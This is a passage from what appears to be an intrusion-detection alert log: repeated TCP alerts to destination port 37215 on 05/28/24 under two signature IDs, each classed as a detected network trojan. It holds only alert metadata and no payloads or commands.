            Timestamp:05/28/24-09:55:47.542617
            SID:2829579
            Source Port:45150
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.967022
            SID:2829579
            Source Port:53554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917428
            SID:2829579
            Source Port:47958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.833534
            SID:2829579
            Source Port:57712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.914976
            SID:2835222
            Source Port:57682
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.470174
            SID:2829579
            Source Port:38114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.950754
            SID:2835222
            Source Port:44118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.732775
            SID:2835222
            Source Port:48650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.596853
            SID:2835222
            Source Port:60254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756798
            SID:2829579
            Source Port:41582
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.582246
            SID:2829579
            Source Port:33618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543990
            SID:2835222
            Source Port:37934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862842
            SID:2835222
            Source Port:46274
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.953473
            SID:2829579
            Source Port:42006
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.944083
            SID:2829579
            Source Port:44202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753813
            SID:2835222
            Source Port:38694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.952796
            SID:2829579
            Source Port:55052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.384036
            SID:2829579
            Source Port:48618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046550
            SID:2835222
            Source Port:34160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.857819
            SID:2835222
            Source Port:54636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.956230
            SID:2829579
            Source Port:33610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.812595
            SID:2829579
            Source Port:48448
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.635029
            SID:2829579
            Source Port:49302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.311566
            SID:2835222
            Source Port:46300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.383607
            SID:2835222
            Source Port:56046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.734283
            SID:2829579
            Source Port:44242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280854
            SID:2835222
            Source Port:58868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862063
            SID:2835222
            Source Port:34242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.004460
            SID:2829579
            Source Port:51480
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.368124
            SID:2835222
            Source Port:38186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.924894
            SID:2829579
            Source Port:34648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.073114
            SID:2829579
            Source Port:57580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.850949
            SID:2829579
            Source Port:42194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869497
            SID:2835222
            Source Port:37498
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.333127
            SID:2835222
            Source Port:38040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.516662
            SID:2829579
            Source Port:46038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989292
            SID:2829579
            Source Port:43982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.510815
            SID:2835222
            Source Port:54124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.368283
            SID:2835222
            Source Port:49570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026509
            SID:2835222
            Source Port:56992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.327398
            SID:2829579
            Source Port:42524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.877684
            SID:2835222
            Source Port:37694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.279493
            SID:2829579
            Source Port:57202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.882036
            SID:2835222
            Source Port:48842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.927119
            SID:2835222
            Source Port:51036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870275
            SID:2835222
            Source Port:60394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.897378
            SID:2835222
            Source Port:39900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842617
            SID:2835222
            Source Port:47166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.612827
            SID:2835222
            Source Port:55214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.300052
            SID:2835222
            Source Port:42798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.651847
            SID:2835222
            Source Port:60442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.948283
            SID:2835222
            Source Port:51958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.879424
            SID:2835222
            Source Port:35648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.316848
            SID:2835222
            Source Port:41026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.641305
            SID:2829579
            Source Port:38746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.951717
            SID:2829579
            Source Port:35868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.275579
            SID:2829579
            Source Port:56076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.048080
            SID:2835222
            Source Port:55932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855523
            SID:2829579
            Source Port:46812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.390933
            SID:2829579
            Source Port:57152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.963436
            SID:2829579
            Source Port:33252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.766566
            SID:2829579
            Source Port:46604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.065525
            SID:2835222
            Source Port:42270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.988549
            SID:2829579
            Source Port:38660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.005116
            SID:2829579
            Source Port:59044
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039841
            SID:2829579
            Source Port:42348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.078004
            SID:2835222
            Source Port:36926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047877
            SID:2835222
            Source Port:37042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.275644
            SID:2829579
            Source Port:55944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756773
            SID:2829579
            Source Port:34326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.027001
            SID:2829579
            Source Port:48024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.823597
            SID:2829579
            Source Port:42790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.413048
            SID:2835222
            Source Port:40814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.844961
            SID:2835222
            Source Port:60006
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.746622
            SID:2835222
            Source Port:58502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857166
            SID:2835222
            Source Port:34862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.771372
            SID:2829579
            Source Port:57406
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841424
            SID:2835222
            Source Port:55906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765990
            SID:2835222
            Source Port:58126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.042618
            SID:2835222
            Source Port:44758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853374
            SID:2835222
            Source Port:37742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.434486
            SID:2835222
            Source Port:42594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.552479
            SID:2829579
            Source Port:36166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.556458
            SID:2835222
            Source Port:47884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.942983
            SID:2835222
            Source Port:51800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.321144
            SID:2835222
            Source Port:39652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.957291
            SID:2835222
            Source Port:33650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.852657
            SID:2835222
            Source Port:43244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.937254
            SID:2829579
            Source Port:41788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840086
            SID:2835222
            Source Port:50350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.004680
            SID:2829579
            Source Port:48046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.560965
            SID:2835222
            Source Port:55976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604939
            SID:2829579
            Source Port:57170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.049271
            SID:2829579
            Source Port:44988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.469693
            SID:2835222
            Source Port:47492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930898
            SID:2829579
            Source Port:36742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.788973
            SID:2835222
            Source Port:54958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.818324
            SID:2829579
            Source Port:53452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748734
            SID:2829579
            Source Port:59206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.262017
            SID:2829579
            Source Port:50776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.320321
            SID:2829579
            Source Port:40794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.962239
            SID:2835222
            Source Port:48116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:09.698209
            SID:2829579
            Source Port:41038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.740311
            SID:2829579
            Source Port:43218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863651
            SID:2829579
            Source Port:40754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922399
            SID:2835222
            Source Port:41976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.421898
            SID:2835222
            Source Port:53826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.622972
            SID:2829579
            Source Port:48316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.915335
            SID:2835222
            Source Port:59890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.703087
            SID:2829579
            Source Port:56598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326083
            SID:2835222
            Source Port:37928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.836969
            SID:2829579
            Source Port:59074
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.323071
            SID:2829579
            Source Port:47318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.313834
            SID:2835222
            Source Port:35924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506486
            SID:2835222
            Source Port:42160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026874
            SID:2829579
            Source Port:58068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.569401
            SID:2829579
            Source Port:45064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.342136
            SID:2835222
            Source Port:50904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869800
            SID:2829579
            Source Port:40688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.284381
            SID:2829579
            Source Port:59536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.323312
            SID:2829579
            Source Port:42098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.886654
            SID:2835222
            Source Port:45876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309162
            SID:2835222
            Source Port:42732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.900908
            SID:2835222
            Source Port:56096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.563407
            SID:2829579
            Source Port:60860
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.562613
            SID:2835222
            Source Port:54082
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.351208
            SID:2835222
            Source Port:33630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.771729
            SID:2829579
            Source Port:55746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.886619
            SID:2835222
            Source Port:57580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052425
            SID:2829579
            Source Port:47016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.883331
            SID:2835222
            Source Port:33836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.563741
            SID:2829579
            Source Port:38318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.713162
            SID:2829579
            Source Port:43462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.380908
            SID:2835222
            Source Port:51526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.675862
            SID:2829579
            Source Port:42028
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.282900
            SID:2829579
            Source Port:39490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.900969
            SID:2829579
            Source Port:39760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.450922
            SID:2829579
            Source Port:42886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.707762
            SID:2835222
            Source Port:43252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.904102
            SID:2829579
            Source Port:54408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.947473
            SID:2829579
            Source Port:52154
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.336891
            SID:2835222
            Source Port:42844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.454118
            SID:2835222
            Source Port:34150
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.231039
            SID:2829579
            Source Port:54022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.544276
            SID:2829579
            Source Port:34080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.508148
            SID:2835222
            Source Port:41158
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.827669
            SID:2835222
            Source Port:42022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775644
            SID:2829579
            Source Port:56512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.680221
            SID:2829579
            Source Port:33566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.926465
            SID:2835222
            Source Port:57378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.804040
            SID:2835222
            Source Port:34734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953671
            SID:2829579
            Source Port:57640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.872570
            SID:2835222
            Source Port:54618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047854
            SID:2829579
            Source Port:39206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.597262
            SID:2835222
            Source Port:49890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575379
            SID:2829579
            Source Port:57362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.433295
            SID:2835222
            Source Port:50258
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.746540
            SID:2835222
            Source Port:34252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909041
            SID:2835222
            Source Port:34670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.676425
            SID:2829579
            Source Port:38844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.828060
            SID:2835222
            Source Port:40450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.716810
            SID:2835222
            Source Port:60748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862248
            SID:2829579
            Source Port:46706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.855155
            SID:2835222
            Source Port:34150
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.864520
            SID:2835222
            Source Port:58104
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.921356
            SID:2835222
            Source Port:41620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.872360
            SID:2835222
            Source Port:33994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.414247
            SID:2829579
            Source Port:42838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.291000
            SID:2835222
            Source Port:44532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.844756
            SID:2835222
            Source Port:53748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.055919
            SID:2835222
            Source Port:50294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.778351
            SID:2829579
            Source Port:39976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.437110
            SID:2835222
            Source Port:34566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.381735
            SID:2829579
            Source Port:34880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.845333
            SID:2835222
            Source Port:52442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.938976
            SID:2835222
            Source Port:60644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047952
            SID:2829579
            Source Port:41004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.471163
            SID:2835222
            Source Port:50404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.320230
            SID:2835222
            Source Port:60928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777674
            SID:2835222
            Source Port:34430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.832618
            SID:2835222
            Source Port:60730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789235
            SID:2829579
            Source Port:49286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.859486
            SID:2829579
            Source Port:44052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.055948
            SID:2829579
            Source Port:51532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.734123
            SID:2835222
            Source Port:55492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.990133
            SID:2829579
            Source Port:51224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.940359
            SID:2829579
            Source Port:38042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.440516
            SID:2829579
            Source Port:56566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.738809
            SID:2829579
            Source Port:40774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.911326
            SID:2835222
            Source Port:54338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.715678
            SID:2829579
            Source Port:49986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.004711
            SID:2829579
            Source Port:33974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.564885
            SID:2835222
            Source Port:34184
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.806264
            SID:2829579
            Source Port:33136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.053976
            SID:2829579
            Source Port:41968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.081181
            SID:2829579
            Source Port:54692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.821906
            SID:2829579
            Source Port:37216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.742359
